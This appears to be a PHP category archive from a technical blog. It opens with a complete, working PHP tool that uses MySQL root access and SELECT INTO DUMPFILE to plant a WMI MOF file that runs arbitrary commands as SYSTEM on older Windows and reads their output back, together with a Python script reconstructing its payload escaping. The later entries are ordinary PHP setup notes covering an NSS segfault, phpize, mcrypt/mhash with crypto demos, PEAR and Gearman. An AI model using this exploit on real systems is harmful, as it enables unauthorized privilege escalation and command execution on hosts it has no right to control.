Category archive: PHP

MOF privilege escalation from MySQL root, with command output: the script

The script below logs into MySQL as root, writes a MOF file into c:\windows\system32\wbem\mof\ with SELECT ... INTO DUMPFILE, and reads the command's output back with load_file(). It relies on the WMI service auto-compiling MOF files dropped into that directory, which Windows XP and Server 2003 do and later Windows versions do not. The MySQL account also needs the FILE privilege, secure_file_priv must not restrict where files may be written, and the MySQL service itself must run with enough privilege to write into System32. The event filter fires whenever Win32_LocalTime.Second equals 5, so the command runs once a minute and the subscription stays in the WMI repository until it is deleted; that is why the "Read" button may need a retry.

<?php
// Command output is redirected to this file on the MySQL host and read back with load_file().
$path="c:/windows/system32/canimei";
session_start();
// Step 1: the login form was submitted; keep the connection details in cookies and reload.
if(!empty($_POST['submit'])){
setcookie("connect");
setcookie("connect[host]",$_POST['host']);
setcookie("connect[user]",$_POST['user']);
setcookie("connect[pass]",$_POST['pass']);
setcookie("connect[dbname]",$_POST['dbname']);
echo "<script>location.href='?action=connect'</script>";
}
// Step 2: no action yet; show the connection form.
if(empty($_GET["action"])){?>
<html><head><title>Win MOF Shell</title></head><body>
<form action="?action=connect" method="post">
Host:<input type="text" name="host" value="192.168.200.144:3306"><br/>
User:<input type="text" name="user" value="root"><br/>
Pass:<input type="password" name="pass" value="toor"><br/>
DB:<input type="text" name="dbname" value="mysql"><br/>
<input type="submit" name="submit" value="Submit"><br/>
</form>
</body></html>
<?php
exit;
}
// Step 3: connected; show the command form and the "Read" form.
if ($_GET['action']=='connect'){
$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die('<pre>'.mysql_error().'</pre>');
$strCmd=isset($_POST['cmd']) ? $_POST['cmd'] : '';
echo "<form action='' method='post'>";
echo "Cmd:";
echo "<input type='text' name='cmd' value='".htmlspecialchars($strCmd, ENT_QUOTES)."'>";
echo "<br>";
echo "<br>";
echo "<input type='submit' value='Exploit'>";
echo "</form>";
echo "<form action='' method='post'>";
echo "<input type='hidden' name='flag' value='flag'>";
echo "<input type='submit'value=' Read '>";
echo "</form>";
if (isset($_POST['cmd'])){
$strCmd=$_POST['cmd'];
$cmdshell='cmd /c '.$strCmd.'>'.$path;
$mofname="c:/windows/system32/wbem/mof/system.mof";
$payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")

instance of __EventFilter as \$EventFilter
{
EventNamespace = \"Root\\\\\\\\Cimv2\";
Name  = \"filtP2\";
Query = \"Select * From __InstanceModificationEvent \"
\"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"
\"And TargetInstance.Second = 5\";
QueryLanguage = \"WQL\";
};

instance of ActiveScriptEventConsumer as \$Consumer
{
Name = \"consPCSV2\";
ScriptingEngine = \"JScript\";
ScriptText =
\"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\";
};

instance of __FilterToConsumerBinding
{
Consumer = \$Consumer;
Filter = \$EventFilter;
};";
mysql_select_db($_COOKIE["connect"]["dbname"],$conn);
$sql1="select '$payload' into dumpfile '$mofname';";
if(mysql_query($sql1))
echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error());
mysql_close($conn);
}

if(isset($_POST['flag']))
{
$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>');
$sql2="select load_file(\"".$path."\");";
$result2=mysql_query($sql2);
while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {
echo "<hr/>";
echo '<pre>'. $row[0].'</pre>';
}
mysql_close($conn);
}
}?>
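The hardest part of the script to read is the $payload string, where the namespace pragma needs sixteen backslashes in a row. The reason is three layers of escaping stacked on top of each other: the MOF file itself uses backslash escapes, the MySQL single-quoted literal in the SELECT ... INTO DUMPFILE statement doubles them, and the PHP double-quoted string doubles them again. The following Python is an added illustration, not code from the original script: it rebuilds the MOF text the script writes, applies each escaping layer in turn, counts the backslash runs at each stage, and unescapes the MySQL literal again to prove the round trip is exact. The command string and the function names are my own; the MOF content matches what the PHP above produces.

```python
"""Escaping layers in the MOF dropper: MOF file <- MySQL literal <- PHP string."""
import re

# Constructed sample command; the script builds it as 'cmd /c <cmd>><outfile>'.
EXAMPLE_CMD = "cmd /c whoami>c:/windows/system32/canimei"

# What $payload expands to once PHP and MySQL have each removed their escaping.
# Raw string: every backslash here is a literal byte of the file on disk.
MOF_TEMPLATE = r'''#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"{cmd}\")";
};

instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
'''


def build_mof(command: str) -> str:
    """MOF text with the command spliced into the JScript string.

    As in the original script the command is inserted unescaped, so a '"' or a
    backslash in it would break the JScript literal (hence the forward slashes
    in the output path).
    """
    return MOF_TEMPLATE.replace("{cmd}", command)


def mysql_quote(text: str) -> str:
    """Wrap text in a MySQL single-quoted literal (backslash escapes enabled)."""
    body = text.replace("\\", "\\\\").replace("'", "\\'").replace("\0", "\\0")
    return "'" + body + "'"


# Escape sequences the MySQL parser recognises; any other \x becomes x.
_MYSQL_ESCAPES = {"0": "\0", "n": "\n", "r": "\r", "t": "\t", "b": "\b",
                  "Z": "\x1a", "%": "\\%", "_": "\\_"}


def mysql_unquote(literal: str) -> str:
    """Decode a single-quoted literal the way the MySQL parser does."""
    if len(literal) < 2 or literal[0] != "'" or literal[-1] != "'":
        raise ValueError("not a single-quoted literal")
    body, out, i = literal[1:-1], [], 0
    while i < len(body):
        ch = body[i]
        if ch == "\\" and i + 1 < len(body):
            out.append(_MYSQL_ESCAPES.get(body[i + 1], body[i + 1]))
            i += 2
        elif ch == "'" and body[i:i + 2] == "''":      # doubled quote form
            out.append("'")
            i += 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def php_double_quoted(text: str) -> str:
    """Escape text for a PHP double-quoted string: \\, \" and \$ are special."""
    body = text.replace("\\", "\\\\").replace('"', '\\"').replace("$", "\\$")
    return '"' + body + '"'


def dumpfile_statement(mof_text: str, target: str) -> str:
    """The SELECT ... INTO DUMPFILE the script sends (requires the FILE privilege)."""
    return "select %s into dumpfile %s;" % (mysql_quote(mof_text), mysql_quote(target))


def longest_backslash_run(text: str) -> int:
    return max((len(m) for m in re.findall(r"\\+", text)), default=0)


if __name__ == "__main__":
    mof = build_mof(EXAMPLE_CMD)
    sql = dumpfile_statement(mof, "c:/windows/system32/wbem/mof/system.mof")
    php = php_double_quoted(mysql_quote(mof))
    for layer, text in (("MOF file", mof), ("MySQL literal", sql), ("PHP source", php)):
        print("%-14s longest backslash run: %d" % (layer, longest_backslash_run(text)))
    assert mysql_unquote(mysql_quote(mof)) == mof
```

Running it prints runs of 4, 8 and 16 backslashes for the three layers, which is exactly the pattern in the $payload string above.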

PHP7 upgrade practice for a web system with over 100 million requests a day

The QQ Membership activity operations platform (AMS) is one of the main carriers of QQ Membership's value-added operations business: a web system that runs a huge number of activities. AMS is an activity operations platform implemented mainly in PHP, handling about 300 million CGI requests a day and up to 800 million at peak. For quite a long time, however, we ran fairly old base software, namely PHP 5.2 + Apache 2.0 (2008-era technology). Since last year in particular, as AMS has grown rapidly with the QQ Membership value-added business, the performance pressure has increased day by day.

So in May 2015 we started planning the upgrade of the PHP runtime, with PHP7 as the final target. At that time PHP7 was still under development, but our discussions and pre-research had already begun. Continue reading

Segfault in libnss when using libcurl from php

$ tools/php-5.2.17/bin/php test1.php
* About to connect() to www.google.com port 443 (#0)
* Trying 74.125.192.103... * connected
* Connected to www.google.com (74.125.192.103) port 443 (#0)
* Initializing NSS with certpath: sql:/etc/pki/nssdb
Segmentation fault (core dumped)

When the URL in the script is changed to use HTTP instead of HTTPS, there is no segfault.
Steps to reproduce: run the script:
$ cat test1.php
<?php
$urlEndPoint = "https://www.google.com/search";
$headerArray = array();
$ch = curl_init();
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_URL, $urlEndPoint);
/* curl_setopt($ch, CURLOPT_HTTPHEADER, $headerArray);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postArray); */

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
// Certificate checks are switched off only to keep the crash repro minimal; the
// crash happens while NSS opens its certificate database, before any handshake.
// Do not carry these two lines into real code.
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)');
curl_setopt($ch, CURLOPT_VERBOSE, true);

if (!$result = curl_exec($ch)) {
    print(curl_error($ch));
}

curl_close($ch);

echo print_r($result, true);
?>

Kernel log:
tail -f /var/log/messages
kernel: php[26564]: segfault at 8048 ip 00007f7a72fede9c sp 00007fffec90edf0 error 4 in libsqlite3.so.0.8.6[7f7a72fd1000+8c000]
gdb trace:
Program received signal SIGSEGV, Segmentation fault.
0x00007fffe9651e9c in sqlite3_file_control () from /usr/lib64/libsqlite3.so.0

The CentOS bug tracker has a report describing this bug:

https://bugs.centos.org/view.php?id=7399

https://www.mankier.com/5/cert9.db

Quick fix:

mv /etc/pki/nssdb /etc/pki/nssdb.bak
yum -y reinstall nss

The crash is inside sqlite while NSS opens the sql: (cert9.db) certificate database under /etc/pki/nssdb; moving that directory aside and reinstalling nss gives you a freshly created default database. Any certificates or trust settings that had been added to /etc/pki/nssdb are not carried over, so keep the .bak copy until they have been re-imported.

Installing and configuring php-cgi with Apache on Linux

1. The difference between php-cgi and php-cli

In the usual case PHP is a product that runs in a web environment: it is developed mixed in with HTML tags, its output is shown in the browser, and it works as an interactive script. PHP sits in a middle layer between the web server (Apache, Microsoft IIS and so on) and the user; the interface through which a server embeds it is called the SAPI (Server API). On a web server PHP always plays the part of the bridge between the application and the user interface.

The PHP CLI version is somewhat like PHP's CGI mode: although they share a lot of behaviour, CLI and CGI are different SAPIs.
The CLI does no GET or POST form handling, writes no MIME headers, and leaves out the other things a web SAPI does implicitly. Continue reading

Compiling dynamic extension modules with phpize

After a server has been running for a while, a need for some extension may suddenly come up, and it has to be added on its own, without recompiling PHP.

What we are doing

  • Compiling and installing PHP from source on Linux is a common thing to do, although personally I still recommend a binary install (rpm, deb and so on). It often turns out that we need some feature from ext/ that was not built in when PHP was compiled. A common solution is to use phpize, PHP's tool for building extension modules (the result is a .so file such as mbstring.so or tidy.so, similar in role to a DLL on Windows), and then enable it with the appropriate setting in the configuration file.
  • The whole process is very similar to compiling an Apache module dynamically, except that Apache's tool is called apxs and PHP's is called phpize.
  • The error below is a typical example; it is telling you that a module needs to be loaded dynamically.
Fatal error: Call to undefined function curl_init() in /var/www/boss.yfang.cn/htdocs/yahooboss.class.php on line 48
# A quick search shows this is a function from PHP's curl module

Continue reading

Installing the mcrypt and mhash extensions on Linux

MCrypt
MCrypt is a replacement for the old crypt() package and crypt(1) command, with extensions. It allows developers to use a wide range of encryption functions, without making drastic changes to their code. It allows users to encrypt files or data streams without having to be cryptographers. Above all, it allows you to have some really neat code on your machine. 🙂

The companion to MCrypt is Libmcrypt, which contains the actual encryption functions themselves, and provides a standardized mechanism for accessing them.
Mhash:

Mhash is a free (under GNU Lesser GPL) library which provides a uniform interface to a large number of hash algorithms. These algorithms can be used to compute checksums, message digests, and other signatures.
The HMAC support implements the basics for message authentication, following RFC 2104. In the later versions some key generation algorithms, which use hash algorithms, have been added. The manpage for mhash is mhash.3.html.

At the time of writing this, the library supports the algorithms:

SHA1, SHA160, SHA192, SHA224, SHA384, SHA512, HAVAL128, HAVAL160, HAVAL192, HAVAL224, HAVAL256, RIPEMD128, RIPEMD256, RIPEMD320, MD4, MD5, TIGER, TIGER128, TIGER160, ADLER32, CRC32, CRC32b, WHIRLPOOL, GOST, SNEFRU128, SNEFRU256

1. Download the software:

Download the Libmcrypt, mhash and mcrypt packages from http://www.sourceforge.net:

Libmcrypt(libmcrypt-2.5.8.tar.gz):http://sourceforge.net/project/showfiles.php?group_id=87941&package_id=91774&release_id=487459
mcrypt(mcrypt-2.6.8.tar.gz):http://sourceforge.net/project/showfiles.php?group_id=87941&package_id=91948&release_id=642101
mhash(mhash-0.9.9.9.tar.gz):http://sourceforge.net/project/showfiles.php?group_id=4286&package_id=4300&release_id=645636

2. Install Libmcrypt first
# tar -zxvf libmcrypt-2.5.8.tar.gz
# cd libmcrypt-2.5.8
# ./configure
# make
# make install

Note: libmcrypt installs under /usr/local by default

3. Install mhash
# tar -zxvf mhash-0.9.9.9.tar.gz
# cd mhash-0.9.9.9
# ./configure
# make
# make install

4. Install mcrypt
# tar -zxvf mcrypt-2.6.8.tar.gz
# cd mcrypt-2.6.8
# export LD_LIBRARY_PATH=/usr/local/lib
# ./configure
# make
# make install

Note: when mcrypt is configured, the libmcrypt shared library is not found and the build fails, because libmcrypt installed it under /usr/local/lib. So export LD_LIBRARY_PATH=/usr/local/lib before configuring mcrypt (a plain assignment without export is not seen by configure; alternatively add /usr/local/lib to /etc/ld.so.conf and run ldconfig). Read the configure output carefully and make sure the LD_LIBRARY_PATH value matches the actual path.

5. Install PHP

No error messages means the installation succeeded; next the mcrypt module has to be added to PHP. Put the function phpinfo() in any PHP file to get PHP's current configure options, then append the options that need to be added:
'--with-mcrypt=/usr/local/include' '--with-mhash'

Then go to the PHP source directory and run the complete configure command; these are my configure options:
'./configure'
'--prefix=/usr/local/php'
'--with-mysql=/usr/local/mysql'
'--with-mysqli=/usr/local/mysql/bin/mysql_config'
'--with-apxs2=/usr/local/apache/bin/apxs'
'--with-jpeg-dir=/usr/local/modules/jpeg6'
'--with-gd=/usr/local/modules/gd'
'--enable-gd-native-ttf'
'--with-iconv'
'--with-png-dir=/usr/local/modules/libpng'
'--with-ttf'
'--with-openssl'
'--with-zlib-dir=/usr/local/modules/zlib/'
'--with-freetype-dir=/usr/local/modules/freetype'
'--enable-magic-quotes'
'--enable-mbstring'
'--enable-force-cgi-redirect'
'--enable-wddx'
'--with-curl=/usr/local/curl'
'--enable-soap'
'--enable-sockets'
'--with-mcrypt=/usr/local/include'
'--with-mhash'

Configuration done; now build and install from the source package
make clean (required)
make
make install

Finally restart the Apache service and everything is in place.

Now the encryption functions can be tried out:

$password = mcrypt_cbc(MCRYPT_DES, $key, $message, MCRYPT_ENCRYPT);  
$password = bin2hex($password ); 

This encryption statement runs, but it raises a notice because recent versions expect an initialization vector (IV). The notice is the least of it: DES's 56-bit key is brute-forceable, ECB mode (used by the 3DES example below) turns equal plaintext blocks into equal ciphertext blocks, and the mcrypt extension itself was deprecated in PHP 7.1 and removed from core in PHP 7.2. For anything that must stay confidential, use openssl_encrypt() with AES in CBC or GCM mode and an IV from random_bytes() instead.
For reference, the code from the manual:

<?php
$key = "this is a secret key";
$input = "Let us meet at 9 o'clock at the secret place.";
$td = mcrypt_module_open('tripledes', '', 'ecb', '');
// Draw the IV from /dev/urandom; MCRYPT_RAND (as in the manual) is the libc rand() and not suitable.
// Note that ECB ignores the IV entirely; open the module with 'cbc' for it to matter.
$iv = mcrypt_create_iv(mcrypt_enc_get_iv_size($td), MCRYPT_DEV_URANDOM);
mcrypt_generic_init($td, $key, $iv);
$encrypted_data = mcrypt_generic($td, $input);
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
?>
<?php
$key = "this is a secret key";
$input = "Let us meet at 9 o'clock at the secret place.";

// 3DES in ECB mode: no IV, and equal plaintext blocks give equal ciphertext blocks.
$encrypted_data = mcrypt_ecb(MCRYPT_3DES, $key, $input, MCRYPT_ENCRYPT);
?>
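The IV notice and the ECB example above are two faces of the same block-cipher mode property, which is easier to see in code than in prose. The following Python is an added illustration, not code from the page or from the mcrypt project. Because no block cipher ships with the standard library, it uses a tiny 8-byte Feistel cipher built from SHA-256 purely as a stand-in for DES/3DES (it is not a secure cipher and must never be used for real data); the mode logic around it is ordinary ECB and CBC with PKCS#7 padding. It shows that ECB leaks repeated plaintext blocks, that CBC hides them only with a fresh IV, and that reusing an IV makes two encryptions of the same message identical again. Key and message are constructed sample values.

```python
"""ECB vs. CBC, and why the IV matters, on a toy 64-bit Feistel cipher."""
import hashlib
import os

BLOCK = 8      # 64-bit blocks, like DES/3DES
ROUNDS = 8


def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    """Round function: 4 bytes of SHA-256(key || round || half). Toy, not a real cipher."""
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:4]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Balanced Feistel network; invertible whatever the round function is."""
    left, right = block[:4], block[4:]
    for rnd in range(ROUNDS):
        left, right = right, _xor(left, _f(key, rnd, right))
    return right + left


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:4], block[4:]
    for rnd in reversed(range(ROUNDS)):
        left, right = right, _xor(left, _f(key, rnd, right))
    return right + left


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def _blocks(data: bytes):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key: bytes, msg: bytes) -> bytes:
    """Each block on its own: identical plaintext blocks give identical ciphertext blocks."""
    return b"".join(block_encrypt(key, b) for b in _blocks(pkcs7_pad(msg)))


def ecb_decrypt(key: bytes, ct: bytes) -> bytes:
    return pkcs7_unpad(b"".join(block_decrypt(key, b) for b in _blocks(ct)))


def cbc_encrypt(key: bytes, iv: bytes, msg: bytes) -> bytes:
    """Each block is XORed with the previous ciphertext block (the IV for the first one)."""
    out, prev = [], iv
    for b in _blocks(pkcs7_pad(msg)):
        prev = block_encrypt(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = [], iv
    for b in _blocks(ct):
        out.append(_xor(block_decrypt(key, b), prev))
        prev = b
    return pkcs7_unpad(b"".join(out))


def distinct_blocks(ct: bytes) -> int:
    return len(set(_blocks(ct)))


if __name__ == "__main__":
    key = b"8-byte k"                    # constructed sample key
    msg = b"ATTACK AT DAWN. " * 4        # 64 bytes: the same two blocks, four times
    print("ECB distinct blocks:", distinct_blocks(ecb_encrypt(key, msg)), "of 9")
    iv = os.urandom(BLOCK)               # fresh IV per message: what mcrypt_create_iv() is for
    print("CBC distinct blocks:", distinct_blocks(cbc_encrypt(key, iv, msg)), "of 9")
    fixed_iv = bytes(BLOCK)
    print("same message, reused IV, identical ciphertext:",
          cbc_encrypt(key, fixed_iv, msg) == cbc_encrypt(key, fixed_iv, msg))
```

ECB yields only three distinct ciphertext blocks for the nine-block message (the two repeating text blocks and the padding block), so the repetition in the plaintext is visible in the ciphertext; CBC with a fresh IV yields nine. With a fixed IV, CBC is deterministic again, which is the weakness the missing-IV notice is warning about.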

mhash:

<?php
$hash_alg = MHASH_TIGER;
print "This data has been hashed with the " . mhash_get_hash_name($hash_alg) . " hashing algorithm.";
?>
<?php  
$input = "what do ya want for nothing?";  
$hash = mhash(MHASH_MD5, $input);  
echo "The hash is " . bin2hex($hash) . "<br />\n";  
$hash = mhash(MHASH_MD5, $input, "Jefe");  
echo "The hmac is " . bin2hex($hash) . "<br />\n";  
?> 
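The two mhash() calls above differ only in the third argument, but that argument turns a plain digest into an HMAC, and the key "Jefe" with "what do ya want for nothing?" is in fact test case 2 of RFC 2202, the published test vectors for RFC 2104. The following Python is an added illustration, not code from the page or from the mhash library: it builds the MAC by hand from the underlying hash exactly as RFC 2104 specifies, checks it against Python's hmac module, and verifies tags with a constant-time comparison. Function names are my own.

```python
"""HMAC as RFC 2104 defines it, checked against the vector the mhash example uses."""
import hashlib
import hmac


def hmac_rfc2104(key: bytes, msg: bytes, hashname: str = "md5") -> bytes:
    """H((K ^ opad) || H((K ^ ipad) || msg)), K zero-padded to the hash's block size."""
    h = lambda data: hashlib.new(hashname, data)
    block_size = h(b"").block_size      # 64 for MD5/SHA-1/SHA-256, 128 for SHA-512
    if len(key) > block_size:           # keys longer than a block are hashed first
        key = h(key).digest()
    key = key.ljust(block_size, b"\x00")
    ipad = bytes(b ^ 0x36 for b in key)
    opad = bytes(b ^ 0x5C for b in key)
    inner = h(ipad + msg).digest()
    return h(opad + inner).digest()


def verify_tag(key: bytes, msg: bytes, tag: bytes, hashname: str = "md5") -> bool:
    """Constant-time comparison so a mismatch position does not leak through timing."""
    return hmac.compare_digest(hmac_rfc2104(key, msg, hashname), tag)


def matches_stdlib(key: bytes, msg: bytes, hashname: str) -> bool:
    """Cross-check the hand-built MAC against the standard library's HMAC."""
    return hmac.compare_digest(hmac_rfc2104(key, msg, hashname),
                               hmac.new(key, msg, hashname).digest())


if __name__ == "__main__":
    key, msg = b"Jefe", b"what do ya want for nothing?"   # RFC 2202 test case 2
    for name in ("md5", "sha1", "sha256"):
        print("%-6s %s stdlib-match=%s" % (name, hmac_rfc2104(key, msg, name).hex(),
                                          matches_stdlib(key, msg, name)))
    print("plain digest, no key:", hashlib.md5(msg).hexdigest())   # mhash() without a key
    print("tampered message verifies:", verify_tag(key, msg + b"!", hmac_rfc2104(key, msg)))
```

The keyed construction is what makes the result a message authentication code rather than a checksum: the plain digest can be recomputed by anyone, the HMAC only by holders of the key. If you are choosing an algorithm today, prefer SHA-256 over MD5 or SHA-1 for the underlying hash.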

******************************************************

Get and Install mhash

wget http://internap.dl.sourceforge.net/sourceforge/mhash/mhash-0.9.9.9.tar.gz
or go to sourceforge and find the latest.

tar -xvzf mhash-0.9.9.9.tar.gz
cd mhash-0.9.9.9
./configure --prefix=/usr/local/mhash
make
make install

Get and install libmcrypt

wget http://easynews.dl.sourceforge.net/sourceforge/mcrypt/libmcrypt-2.5.8.tar.gz
tar -xvzf libmcrypt-2.5.8.tar.gz
cd libmcrypt-2.5.8
./configure --prefix=/usr/local/libmcrypt --disable-posix-threads
make
make install

Get and install mcrypt.

wget http://superb-west.dl.sourceforge.net/sourceforge/mcrypt/mcrypt-2.6.8.tar.gz
or go to source forge and get the latest.

tar -zxvf mcrypt-2.6.8.tar.gz
cd mcrypt-2.6.8
./configure
make
make install

Create the mcrypt php5 module to load.

Find the source code for your PHP version.

use: find / -name "php"

mine was found here /usr/src/redhat/SOURCES/php-5.1.6/

cd to php-5.2.6/ext/mcrypt
phpize
aclocal
./configure
make clean
make
make install

If you are using a 64 bit computer, create a symbolic link.
cd /usr/lib64/modules
ln -s /usr/local/lib/php/extensions/no-debug-non-zts-20050922/mcrypt.so ./mcrypt.so

Create a new file named mcrypt.ini in the /etc/php.d directory containing the following.

;Enable mcrypt extension module
extension=mcrypt.so

Create the mhash extension:

cd to php-5.2.6/ext/mhash
phpize
aclocal
./configure
make clean
make
make install

cd /usr/lib64/modules
[root modules]# ln -s /usr/local/lib/php/extensions/no-debug-non-zts-20050922/mhash.so ./mhash.so

Create a new file named mhash.ini in the /etc/php.d directory containing the following.

;Enable mhash extension module
extension=mhash.so

Bounce Apache
[root /]#service httpd restart
Stopping httpd:                                            [  OK  ]
Starting httpd:                                            [  OK  ]

Check Apache for mcrypt loaded.
Move to your website location and create a file named phpinfo.php containing:

<?=phpinfo();?>

Now open a browser and point it to your site's /phpinfo.php

Look for a section named mcrypt and mhash, they should show the version, supported ciphers, enabled, etc.

Note: If you do not see the section, then the module did not load.

Distributing the workload of PHP applications with Gearman

This article introduces the Gearman work-distribution system and shows how to distribute the workload of applications written in PHP, C, Ruby and the other supported languages.

Although most of a web application is about presentation, its value and competitive advantage may lie in a few proprietary services or algorithms. If that processing is too complex or too slow, it is best run asynchronously so that the web server does not stop responding to incoming requests. In practice, moving a compute-intensive or specialised function onto one or more separate, dedicated servers works even better. Continue reading

How to implement COMET with PHP

Comet is a programming technique that enables web servers to send data to the client without the client having to request it. It produces more responsive applications than classic AJAX: in a classic AJAX application the web browser (client) cannot be notified in real time that the server's data model has changed; the user must trigger a request (for example by clicking a link), or a periodic AJAX request must be made, to get new data from the server.
Continue reading

pear quick start

PEAR updates
PHP 4.05 and later ship with the pear package
1. http://cvs.php.net, in the php4 directory
2. http://pear.php.net, Browse Packages

Using PEAR
On Linux:
A Linux machine with PHP 4.05 or later has pear installed by default; just change include_path in php.ini to the directory where pear is stored, for example:
for UNIX
include_path = "/usr/local/lib/php/"
then restart Apache.

On Windows:
An environment set up on Windows with the AppServ installer (version 1.9 and earlier) has no pear; copy the pear package into the php directory and then change the path in php.ini to the directory where pear is stored, for example:
for windows
include_path = "d:\Appserv\php\pear\"
then restart Apache.

Testing PEAR:
1. Connecting to the database
Once pear is configured, a file that calls pear can be placed anywhere under the server's document directory (www)

<?php
require_once("DB.php");

// connect to the database
$db_host = "localhost";
$db_user = "root";
$db_passwd = "szsydns";
$db_dbName = "user";
$PersistentConnection = 1;
$db_type = "mysql";
$db_proto = "";
$db_options = "";
$db = DB::connect("$db_type://$db_user:$db_passwd@$db_host/$db_dbName", $db_options);

if (DB::isError($db)) {
    echo "Cannot connect to the database, reason: " . DB::errorMessage($db);
}
?>

2. Fetching data

<?php
// run a query on the global $db connection and stop on error
function sql_exec($sql) {
    global $db;
    $result = $db->query($sql);
    if (DB::isError($result)) {
        echo "Database error: " . DB::errorMessage($result);
        exit();
    }
    return $result;
}
$sql = "select * from id";
$result = sql_exec($sql);
while ($row = $result->fetchRow()) {
    echo "Name: $row[0] Gender: $row[1] Age: $row[2]<br>";
}
?>

SQL Server 2005 Driver for PHP

SQL Server 2005 Driver for PHP Documentation
Example Application (SQL Server 2005 Driver for PHP)

The AdventureWorks Product Reviews example application is a Web application that demonstrates the functionality of the SQL Server 2005 Driver for PHP. The application lets a user search for products by entering a keyword, see reviews for a selected product, write a review for a selected product, and upload an image for a selected product.

Running the Example Application
Install the SQL Server 2005 Driver for PHP. For detailed information, see Getting Started (SQL Server 2005 Driver for PHP).

Copy the code listed later in this document into two files: adventureworks_demo.php and photo.php.
Continue reading